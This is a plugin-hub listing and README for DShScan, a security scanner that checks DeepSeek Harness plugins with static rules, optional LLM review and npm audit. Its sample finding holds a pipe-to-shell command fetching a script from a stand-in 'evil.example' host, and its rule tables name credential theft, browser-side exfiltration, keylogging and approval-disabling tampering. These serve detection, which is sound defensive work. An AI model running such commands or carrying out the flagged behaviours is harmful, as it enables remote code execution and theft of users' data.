DeepSeek Harness Plugin Hub

发布与管理完整 Harness Profiles,发现适合你的插件。

探索

插件目录环境预设文档中心动态

社区

发布插件联系我们报告问题

相关链接

Plugin Hub GitHubDeepSeek Harness 官方项目系统状态隐私说明
© 2026 DeepSeek Harness Plugin HubPowered byPaxTech

独立、非官方社区项目,与 DeepSeek 官方无隶属、授权或背书关系。

Scan — DeepSeek Harness 插件(DSH Plugin)
← Plugins
S

@shaoshi/dshscan

Scan

DSH 插件安全扫描器:对插件源代码进行静态和语义检查,应用 DSH 专用攻击面规则,执行 npm audit,支持批量扫描,并生成包含每项发现的严重性和证据的 HTML 报告。

插件会安装到这里;不确定时保持 web。

npx -y @deepseek-ai/dsh plugin --profile web add github:shaoshi20/dshscan#e08871356e2cd60f72e1b1880dacbf19f41b8056
README兼容性版本
DShScan Demo Report

兼容性与来源证明

Scan 以 @shaoshi/dshscan 发布,当前版本为 0.5.0。Plugin Hub 会校验它的 manifest,并保存精确安装来源,便于复现安装结果。

DSH 兼容范围
*
运行环境
any
发布来源
github
Registry 更新时间
2026/8/20

版本

0.5.0stable
2026/8/20

相关插件

正在加载相关插件…

最新版
0.5.0
DSH
*
HMR
重启进程
Tree shaking
未声明可安全裁剪
解包体积
未提供
文件数
未提供
Surface
any
许可证
MIT
发布源
github
GitHub
★ 10
周下载
0
最近提交
2026/8/21
查看源码 ↗
README Badge

点击下方 Badge 复制 Markdown,粘贴到 README 即可。

这是你的 Plugin?认领权益 · 优先安全扫描

验证 package.json 声明的 GitHub 仓库,即可管理这个公开页面。认领后,Hub 会优先安排当前版本的安全扫描,并在通过后公开展示结果。

认领这个 Plugin →
报告问题
DeepSeek Harness Plugin Hub
ProfilesPlugins分类动态文档登录管理 Profiles
ProfilesPlugins分类动态文档登录

README

DShScan

English | 中文

DSH 插件安全扫描器:对插件源码做静态与语义双通道检查,内置 DSH 特有攻击面规则,集成 npm audit,支持批量扫描,输出带严重等级与证据的 HTML 报告。

Demo

DShScan Demo Report

插件市场

已收录于 dshbase 插件目录:

https://dshbase.com/plugins/@shaoshi/dshscan/

在线 Demo:

https://shaoshi20.github.io/dshscan/

作为 DSH 插件安装:

dsh plugin add @shaoshi/dshscan

功能

  • 输入:插件名 / GitHub 仓库地址 / 本地目录 / zip / Markdown 文件
  • 输出:JSON 报告,包含 risk_score、severity、safe_to_install、recommendation、findings
  • 双通道扫描:
    • 静态规则扫描(完全离线)
    • 可选 LLM 语义扫描(需 API Key)
  • dshbase 集成:输入插件名时自动读取本地索引元数据(stars / trust / verified / npm / cmd)
  • npm 源码扫描:npm 插件可自动 npm pack 下载并扫描包内容
  • 依赖审计:检查未锁定版本、远程依赖源、依赖包名仿冒;可选 --audit 调用 npm audit
  • DSH manifest 校验:检查 dsh.bundle、cordis.patch.yml、LICENSE、README
  • DSH 攻击面规则:R010 插件树注入、R011 浏览器侧恶意代码、R012 profile 篡改、R013 manifest 混淆、R014 远程动态加载、R015 内置工具影子劫持
  • Benchmark 评估集:内置恶意/良性样例,dshscan --benchmark 输出查全率、误报率、F1 与逐规则指标
  • 自定义规则:支持 --rules <file> 加载 JSON 规则
  • 策略文件:支持 --policy <file> 配置 ignoreRules / severityOverrides / includeScopes / excludeScopes
  • 审计日志:支持 --audit-log <file> 以 JSONL 记录每个被标记项
  • Web Dashboard:支持 --serve 启动本地可视化面板,内置风险分数趋势、发现数量趋势、严重级分布图,并自动把扫描历史写入 .dshscan-history.json
  • HTML 报告:支持 --html 输出独立网页报告
  • 误报处理:每条 finding 都带证据 + 修复建议
  • 批量扫描:支持对 dshbase 插件目录批量扫描并输出汇总 JSON / HTML
  • 定时巡检:GitHub Actions 每日自动拉取 dshbase 目录并批量扫描

安装与构建

cd path/to/dshscan
npm install
npm run build

构建后生成 dist/main.js,可通过 dshscan.cmd 或 node dist/main.js 调用。

使用

# 扫描 dshbase 插件(按名称自动查索引,并尝试 clone 源码)
dshscan <plugin-name>
dshscan another-plugin

# 扫描 GitHub 仓库
dshscan github:owner/repo
dshscan https://github.com/owner/repo

# 扫描本地目录 / zip / md
dshscan /path/to/plugin
dshscan plugin.zip
dshscan README.md

# 仅离线扫描(不 clone 远程仓库,只给索引元数据 + 静态限制说明)
dshscan <plugin-name> --offline

# 启用 LLM 语义扫描(需要设置 DSCAN_LLM_API_KEY 或 OPENAI_API_KEY)
dshscan <plugin-name> --semantic

# 自定义 LLM 接入
dshscan <plugin-name> --semantic --llm-base-url https://api.openai.com/v1 --llm-model gpt-4o-mini

# 输出到文件
dshscan <plugin-name> --output report.json --pretty

# 输出人类可读摘要
dshscan <plugin-name> --summary

# 输出 HTML 报告
dshscan <plugin-name> --html --output report.html

# 批量扫描输出 HTML
dshscan --batch --all --html --output batch.html

# 启用 npm audit 依赖漏洞扫描
dshscan <plugin-name> --audit

# 加载自定义规则
dshscan <plugin-name> --rules custom-rules.json

# 加载策略并输出审计日志
dshscan <plugin-name> --policy policy.json --audit-log audit.jsonl

# 启动本地 Web 可视化面板(含趋势图,历史写入 .dshscan-history.json)
dshscan --serve --port 8787

# 指定历史文件
dshscan --serve --port 8787 --history /path/to/history.json

# 运行 Benchmark 评估集(恶意/良性样例,输出摘要)
dshscan --benchmark --summary

# 输出完整 Benchmark JSON 报告
dshscan --benchmark --pretty

# 批量扫描 dshbase 插件(默认离线,按 stars 取前 N)
dshscan --batch --limit 50 --index /path/to/dshbase-directory.json --output batch.json --pretty

# 批量扫描全部插件(离线)
dshscan --batch --all --offline --output all.json

环境变量

变量用途默认
DSCAN_INDEXdshbase 插件索引 JSON 路径~/.dsh/dshbase-directory.json(可用环境变量覆盖)
DSCAN_LLM_API_KEY语义扫描 API Key无(未设置则仅静态扫描)
OPENAI_API_KEY备选 API Key无
DSCAN_LLM_BASE_URLOpenAI 兼容接口地址https://api.openai.com/v1
DSCAN_LLM_MODEL语义分析模型gpt-4o-mini

JSON 报告格式

{
  "tool": "DShScan",
  "version": "0.2.1",
  "target": {
    "kind": "plugin",
    "raw": "some-plugin",
    "displayName": "some-plugin",
    "repoUrl": "https://github.com/owner/some-plugin.git",
    "metadata": {
      "name": "some-plugin",
      "stars": 120,
      "trust": "silver",
      "verified": true,
      "npm": false,
      "cmd": "dsh plugin add github:owner/some-plugin"
    }
  },
  "risk_score": 0,
  "severity": "low",
  "safe_to_install": true,
  "recommendation": "风险较低,可以安装;仍建议保持插件更新并定期复查。",
  "findings": [],
  "llm_used": false,
  "scan_mode": "static",
  "scan_note": "仅静态扫描,非完整扫描。",
  "metadata": {
    "name": "some-plugin",
    "stars": 120,
    "trust": "silver",
    "verified": true,
    "npm": false,
    "cmd": "dsh plugin add github:owner/some-plugin"
  }
}

finding 对象

{
  "id": "R001",
  "severity": "critical",
  "category": "remote-code-execution",
  "title": "Remote script piped to shell",
  "evidence": "install.sh:12: curl -fsSL https://evil.example/x.sh | bash",
  "recommendation": "Remove remote-pipe-to-shell installers. Vendor the script, pin a checksum, and review before execution.",
  "source": "static",
  "rule": "R001"
}

严重等级与风险分

risk_scoreseverity
0–29low
30–59medium
60–79high
80–100critical

safe_to_install 为 true 仅当:没有 high/critical finding,且 risk_score < 40。

计分方式:每个类别只取最高严重级的权重(critical=50 / high=30 / medium=15 / low=5), 同一类别的重复命中(如 40 处 chmod)不叠加,类别间求和后封顶 100——避免噪音把分数顶满。

上下文衰减:命中在以下文件里会降一级严重级(文档/测试是描述性的,信号置信度低):

  • 文档(.md / .markdown / .txt / .rst)——R008(提示注入,本身针对文档)除外
  • 测试代码(test(s)/ 目录、*.test.*、*_test.*、test_*)
  • 构建镜像(Dockerfile*、docker-compose*.yml)

以下目录完全不扫描:.github / .circleci / .gitlab、third_party / vendor 等 vendored 依赖、 node_modules / dist / build 等构建产物。

静态规则

ID严重等级类别
R001critical远程脚本管道执行
R002high动态代码执行(独立 eval、shell eval "..."、new Function、vm 逃逸、os.system、child_process.exec)
R002bmediumshell: true / shell=True(单独出现的弱信号)
R003high混淆代码
R004mediumHTTP 明文网络端点(排除模板插值、命名空间 URI、本地/示例域名)
R004bmedium硬编码公网 IP 回调(排除私网/环回段)
R005high凭据读取/窃取
R006high持久化/提权(仅强信号:chmod 777、systemctl enable、注册表 Run 键、schtasks、launchctl、crontab -e、--unsafe-perm)
R007medium远程包安装源
R008criticalREADME 提示注入
R009medium/highpackage.json 生命周期脚本
R010highDSH:cordis.patch.yml 插件树注入(insert 危险 loader / 禁用安全行)
R011highDSH:client.mjs 浏览器侧恶意代码(sendBeacon、键盘记录、DOM 注入、外连)
R012criticalDSH:profile 配置篡改(禁用安全行、添加可疑 bundle、写/执行 profile 文件)
M001–M005low/high索引元数据风险信号(M005=疑似 typosquatting)
E001–E005medium/high扫描限制/输入错误

DSH 特有攻击面

  • R010 cordis.patch.yml 插件树注入:插件自带的 cordis.patch.yml 如果 insert 了 @deepseek-ai/dsh-mcp-client、cordis-plugin-group 等 loader 行,或把 tool-bash、approval、permission 等安全行 disabled: true,属于高风险插件树篡改。
  • R011 client.mjs 浏览器侧恶意代码:DSH 插件可以注入 Web 客户端代码;检测 sendBeacon 外传、键盘/输入监听、剪贴板读取、innerHTML 注入、postMessage *、外连 WebSocket/fetch 等浏览器侧恶意行为。
  • R012 profile 配置篡改:插件如果试图修改 cordis.yml / cordis.patch.yml / package.json 的 dsh.profile.bundles / pnpm-workspace.yaml,或通过代码写/执行 ~/.dsh、profiles、patch 文件,属于严重供应链风险。

测试

npm test

基于 Node 内置 test runner(node --test),覆盖规则命中/反例、上下文衰减、 计分封顶、路径分类与恶意样例端到端判定。

说明

  • verified=true 仅表示 dshbase CI 可安装,不等于安全审计。
  • 静态扫描无需网络;但扫描 GitHub 仓库时获取源码需要网络(可用 --offline 跳过)。
  • 低风险但未启用语义扫描时,报告会标注 scan_mode: "static" 和 "仅静态扫描,非完整扫描"。
  • 报告超过 100 条 finding 时只展示按严重级排序的前 100 条,并置 findings_truncated: true(计分与安装建议仍基于全量)。
  • 索引文件缺失/损坏不会导致崩溃:自动降级为无元数据通道并提示(可用 DSCAN_INDEX 指向你自己的索引)。

相关插件

继续浏览 security-access 分类下经过校验的插件。

Doctor@linxin666/dsh-doctorDSH 配置档案的事务性救援模式,配备受监督的启动器、隔离的恢复容器、确定性修复、健康监控以及本地 Web 恢复控制台Pocketdsh-pocket把 DeepSeek Harness 装进你的口袋:一个包、一个设置页,手机扫码即同步访问电脑上的 DSH(局域网 + 公网,实时同屏)。DSCODE@toddzheng024/dscode-bundle完整的 DeepSeek 编码代理,支持持久化 shell、Ultra 协作和自动权限审查。Auto Reviewdsh-auto-review针对 DeepSeek Harness 审批请求的第二模型 AI 自动审查:只读审查子代理在审批应答链上决定允许或拒绝,并采用故障关闭回退机制和完整的会话日志审计。